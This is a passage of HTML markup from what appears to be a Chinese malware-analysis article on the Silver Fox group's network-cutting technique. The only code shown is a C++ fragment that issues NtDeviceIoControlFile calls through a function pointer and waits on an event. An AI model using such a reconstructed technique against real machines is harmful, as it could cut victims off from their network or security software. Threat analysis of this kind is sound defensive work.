leaf="">nullptr, FALSE, FALSE, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(!</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">hEvent</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> GetLastError</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">();</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">IO_STATUS_BLOCK ioStatus </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">NTSTATUS status </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pNtDeviceIoControlFile</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">hDevice,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">hEvent,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">ioStatus,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">dwIoControlCode,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">lpInBuffer,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">nInBufferSize,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">lpOutBuffer,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">lpBytesReturned</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">status </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> STATUS_PENDING</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">status </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pNtWaitForSingleObject</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">hEvent, FALSE, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">NT_SUCCESS</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">status</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">))</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">status </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> ioStatus</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">Status</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">CloseHandle</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">hEvent</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(!</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">NT_SUCCESS</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span 